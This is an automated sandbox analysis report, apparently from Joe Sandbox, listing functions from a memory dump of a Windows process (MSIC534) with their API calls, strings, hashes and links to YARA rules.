Instruction ID: 8c707f3825257dc44f450e25dec5c40ea0c4f89af4750737db757f1773736f70
Opcode Fuzzy Hash: 7314d4313823993fa5e2071c46be05ca7fd90f75f03cd2b4e5bea4768873b97c
Instruction Fuzzy Hash: 8651C2A1B08B8585EB109F16E5043AEA376EB84FD0F154636DFAD4B795DE7CE0A1C300

Function 00007FF6D9BFBC90 Relevance: 7.6, APIs: 5, Instructions: 144memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000000,FFFFFFFF,?,00000000,00000000,00007FF6D9BFB849), ref: 00007FF6D9BFBD43
LocalFree.KERNEL32(?,00000000,00000000,00007FF6D9BFB849), ref: 00007FF6D9BFBE38
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9BFBE67
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BFBE73

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Local$AllocConcurrency::cancel_current_taskFree_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 4101084277-0
Opcode ID: 267a0540851bd796247e095fd526036fe94a45c2c535a2dc5d353bb714b7e019
Instruction ID: 46c49169a29b303afbf4c341266d8ec96c63f69705f13f1d3cc1b8f37151d265
Opcode Fuzzy Hash: 267a0540851bd796247e095fd526036fe94a45c2c535a2dc5d353bb714b7e019
Instruction Fuzzy Hash: 8F51D06AB06A9982EA148F55E45437E6360BB45BE8F514A36DF7C47BD0DF3DD0A18300

Function 00007FF6D9BF46C0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FF6D9BF4770
LocalFree.KERNEL32 ref: 00007FF6D9BF484B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9BF487A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF4886

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Local$AllocConcurrency::cancel_current_taskFree_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 4101084277-0
Opcode ID: 3d50bd0cecad5427543ccaa9745356229240f2edca31bc343e374fa73694d5fc
Instruction ID: 835bb973f045bc5937eebbde3d3e61a88814228b9fe20f34f8364d2e4e590866
Opcode Fuzzy Hash: 3d50bd0cecad5427543ccaa9745356229240f2edca31bc343e374fa73694d5fc
Instruction Fuzzy Hash: B141242AB06A8942EA14CF55E40827E6362FB06BE8F514636DF7C477D4DF3CE0608300

Function 00007FF6D9BFA9F0 Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32 ref: 00007FF6D9BFAB7B

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: 738b738466b5265432daf8a86e748a35c726645d087d339b92698e94175488fe
Instruction ID: 353620321d293b71249f25838c0d805865394103892d68fc12fdf72184132298
Opcode Fuzzy Hash: 738b738466b5265432daf8a86e748a35c726645d087d339b92698e94175488fe
Instruction Fuzzy Hash: DD41362570AB8985EA188F15E14436EB362EB45BD8F154233CB5C4B7D6EF7ED065C300

Function 00007FF6D9BFF9C0 Relevance: 7.6, APIs: 5, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9BFE735), ref: 00007FF6D9BFFA70
LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9BFE735), ref: 00007FF6D9BFFA92
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00007FF6D9BFE735), ref: 00007FF6D9BFFAFF
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9BFFB4D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BFFB53

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Local$Alloc$Concurrency::cancel_current_taskFree_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1259271893-0
Opcode ID: ab0cc08f99234d715a179517fc8b4ba6950f5af868b2200aedc5622ef0d96408
Instruction ID: 4fe15d0e92e05b71d2d69589d901441ca030d944087c4a270a6767ea026cb54f
Opcode Fuzzy Hash: ab0cc08f99234d715a179517fc8b4ba6950f5af868b2200aedc5622ef0d96408
Instruction Fuzzy Hash: EB410565B0AB8985EA109F11A40436EAB71FB05BD8F184632DF5D4B7D5DE7CE061C300

Function 00007FF6D9BF7A60 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6D9BF7A79

Strings

false, xrefs: 00007FF6D9BF7A81
Call to ShellExecuteEx() returned:, xrefs: 00007FF6D9BF7AAA
Last error=, xrefs: 00007FF6D9BF7B20
true, xrefs: 00007FF6D9BF7A8B

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ErrorLast
String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
API String ID: 1452528299-1782174991
Opcode ID: a3706dd6c48fb8d0848276de09c76d780a6e5533f151456acfeeec08a92eea57
Instruction ID: 184134b41ac3de57e7ef3d1c4beab8579f6d535be70596c03f4a4f31f7760f36
Opcode Fuzzy Hash: a3706dd6c48fb8d0848276de09c76d780a6e5533f151456acfeeec08a92eea57
Instruction Fuzzy Hash: BD31695AA1564581EB118F20E8603BA77F0FF45F88F9A9076DA8A833A4EF3CD552C305

Function 00007FF6D9BF4960 Relevance: 7.6, APIs: 5, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FF6D9BF49DB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9BF4A73
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF4A79
CoUninitialize.OLE32 ref: 00007FF6D9BF4A89

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: AllocConcurrency::cancel_current_taskLocalUninitialize_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 121216245-0
Opcode ID: dfeeda7dc5b4eacddbf20e6326d089c794a673fe21d1428d649532e4c07d3379
Instruction ID: 663b56a8249347473447339fd6555d34facbd25bffe8c181a34bbf40a62f5f20
Opcode Fuzzy Hash: dfeeda7dc5b4eacddbf20e6326d089c794a673fe21d1428d649532e4c07d3379
Instruction Fuzzy Hash: 2A313725B0A74981FA249F11944833E22A2EB05BD4F554636D76D47BC5DF3DE0B1C304

Function 00007FF6D9C2B850 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6D9C2B8C0
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6D9C2B90B

Strings

MOC, xrefs: 00007FF6D9C2B8D4
RCC, xrefs: 00007FF6D9C2B8DC

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 6b1df792a578f16dc51dec8d855888550671b19fd05fd9b9568840239f08910e
Instruction ID: 9e32e303f012f4607eab5de5c3e04dee24dfc2868ec873dc743591b66f596602
Opcode Fuzzy Hash: 6b1df792a578f16dc51dec8d855888550671b19fd05fd9b9568840239f08910e
Instruction Fuzzy Hash: CF91C073A18B858AE720DF65D8802AD7BB0FB457C8F14513AEA8C97759DF38D1A5CB00

Function 00007FF6D9C29F24 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6D9C29F4F
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6D9C29FE6
RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF6D9C2868E), ref: 00007FF6D9C2A040

Strings

csm, xrefs: 00007FF6D9C29FCD

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 5c8bf5583c79376617325a14c9887d91f44b4c143073b17ef00fbcd11834dc60
Instruction ID: a45670b442e13214a889fe27dc983fdd88713f3367169c92b656aa8eab71a916
Opcode Fuzzy Hash: 5c8bf5583c79376617325a14c9887d91f44b4c143073b17ef00fbcd11834dc60
Instruction Fuzzy Hash: 34519D32B19A029AEB64CF15D444A7D33B1EB44BD8F519132EA4E87788DF7DE861C700

Function 00007FF6D9C06844 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C06868
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C06914
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C0692F

Strings

bad locale name, xrefs: 00007FF6D9C06A2F

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Concurrency::cancel_current_taskLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2115809835-1405518554
Opcode ID: 5fe8542f379b332b509065c449abdd4343ae592ed269cc8bd30ca243a69752e2
Instruction ID: 7b286319c7c4a5cac4de434c3c26aef003bba0ff07642ad0add84bb4bec72ca7
Opcode Fuzzy Hash: 5fe8542f379b332b509065c449abdd4343ae592ed269cc8bd30ca243a69752e2
Instruction Fuzzy Hash: 02516EA2A09B4641EB58AF26D65127D63B1EB84FC4F484232DA4E87B95DF3CE861C340

Function 00007FF6D9C2BDD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6D9C2BDF8
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6D9C2BEE0

Strings

csm, xrefs: 00007FF6D9C2BF32
csm, xrefs: 00007FF6D9C2BE1A

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 0abfadf79ff58853b4606986ad5e381df4c0ec61c91b30c107ed3d920a3e07a9
Instruction ID: ce13d1720c9442157541cff544780035dfcc1ba760791b08410da3f265f0ea2a
Opcode Fuzzy Hash: 0abfadf79ff58853b4606986ad5e381df4c0ec61c91b30c107ed3d920a3e07a9
Instruction Fuzzy Hash: DC514B369082828AEB748F26954467C77B0EB56BD4F146136EA9D87BC5CF3CE5A0CB01

Function 00007FF6D9C2B5E0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6D9C2B63F
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6D9C2B68B

Strings

RCC, xrefs: 00007FF6D9C2B65B
MOC, xrefs: 00007FF6D9C2B653

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: fcac4738994a39817b61394e96e5c600a803cd627c5b4d92602dcbddadf67c8f
Instruction ID: 724fa10e5af83b341b7898a3be3e181d0d4b9bd603d728a27e3d09b67a625ad5
Opcode Fuzzy Hash: fcac4738994a39817b61394e96e5c600a803cd627c5b4d92602dcbddadf67c8f
Instruction Fuzzy Hash: A5614C32908B8586D6719F15E4403AEB7B0FB85BD4F045226EB9D87B95DF7CE1A4CB00

Function 00007FF6D9BF58D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32 ref: 00007FF6D9BF591E
GetLastError.KERNEL32 ref: 00007FF6D9BF5A34

Part of subcall function 00007FF6D9BF21E0: GetProcessHeap.KERNEL32(?,?,?,00007FF6D9BF37E1), ref: 00007FF6D9BF2216

Part of subcall function 00007FF6D9BF1C00: FindResourceW.KERNEL32(?,?,00000000,00007FF6D9BF192F,?,?,?,?,?,00007FF6D9BF184D), ref: 00007FF6D9BF1C51
Part of subcall function 00007FF6D9BF1C00: wmemcpy_s.LIBCMT ref: 00007FF6D9BF1CA1

LoadLibraryExW.KERNEL32 ref: 00007FF6D9BF59E8

Strings

ntdll.dll, xrefs: 00007FF6D9BF59B8

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystemwmemcpy_s
String ID: ntdll.dll
API String ID: 2090340569-2227199552
Opcode ID: 4f017e4b34d0987f96797e81f45e1a0d591897458d6af0aebac51ff099210c4d
Instruction ID: 3fe89ce57b2507e0eb22520b12e98c00f1377a508194efc783c4fb95408ad701
Opcode Fuzzy Hash: 4f017e4b34d0987f96797e81f45e1a0d591897458d6af0aebac51ff099210c4d
Instruction Fuzzy Hash: D241A036A19B4982EA10DF15E84027E73B0FB89BD4F454132DA5D837A5DF3DD561C780

Function 00007FF6D9C15EE4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON

Download Yara Rule

APIs

_Getvals.LIBCPMT ref: 00007FF6D9C15F62

Part of subcall function 00007FF6D9C15CAC: std::_Maklocwcs.LIBCPMT ref: 00007FF6D9C15CCC
Part of subcall function 00007FF6D9C15CAC: std::_Maklocwcs.LIBCPMT ref: 00007FF6D9C15CE9
Part of subcall function 00007FF6D9C15CAC: std::_Maklocwcs.LIBCPMT ref: 00007FF6D9C15D06

Strings

+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v, xrefs: 00007FF6D9C15F9B
$+xv, xrefs: 00007FF6D9C15F94
$+xv, xrefs: 00007FF6D9C1600B

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Maklocwcsstd::_$Getvals
String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
API String ID: 1848906033-3573081731
Opcode ID: b9039ff8cdb21243be9e35249a0579b0bfae3ce7d598090ca24a24e980762b3a
Instruction ID: 9350e5b5e8b2f99749bfbc56fb8d3c7cb643035afce0da0cb0411872f8462dce
Opcode Fuzzy Hash: b9039ff8cdb21243be9e35249a0579b0bfae3ce7d598090ca24a24e980762b3a
Instruction Fuzzy Hash: 58418C72A08B918BE720CF21918076EBBB0FB46BC1F454236D78E93A51DF29F561CB04

Function 00007FF6D9C4AD94 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6D9C4AE13
WriteFile.KERNEL32 ref: 00007FF6D9C4B0F0
WriteFile.KERNEL32 ref: 00007FF6D9C4B136
GetLastError.KERNEL32 ref: 00007FF6D9C4B1F5

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: d331474d9041d8dc70f6197933d7d00de3c0342d5c2ce0b675f97eb690a77ddb
Instruction ID: 77782177da19579e6130175dc6a14f7497e13bd592af15fb1ba4604ff5283f60
Opcode Fuzzy Hash: d331474d9041d8dc70f6197933d7d00de3c0342d5c2ce0b675f97eb690a77ddb
Instruction Fuzzy Hash: 2AD1DE32B19A8589E711CFB9D4402AC37B1FB49BD8B444237DE5D97B99CE38E526C700

Function 00007FF6D9C0FDC4 Relevance: 6.3, APIs: 4, Instructions: 283COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C0FFCA
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C0FFD6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C101D8
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C101E4

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: a085e3e58b56e6e7bc15dfcd1afdafbfe9d13c5a3161bd299f3db009eb6b914b
Instruction ID: 4abdd7641d66600fb32b9d07e13e8a371268400008d73b4b706dbcae728186b0
Opcode Fuzzy Hash: a085e3e58b56e6e7bc15dfcd1afdafbfe9d13c5a3161bd299f3db009eb6b914b
Instruction Fuzzy Hash: 26B1C2A2B08A4595EA18DF16E5002BD6371EB05BE4F544732EA3D83BE9DF7CE5A1C304

Function 00007FF6D9C4B6E0 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FF6D9C4B6CB), ref: 00007FF6D9C4B7FE

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: ccca98ebb091c9da7ec789f755d8c99d2df8471d8a47f9d6018264015d811d81
Instruction ID: 0e85b6e2b6d0d09c334842f792a8e911ac7404434beb4770db569a806a12caf9
Opcode Fuzzy Hash: ccca98ebb091c9da7ec789f755d8c99d2df8471d8a47f9d6018264015d811d81
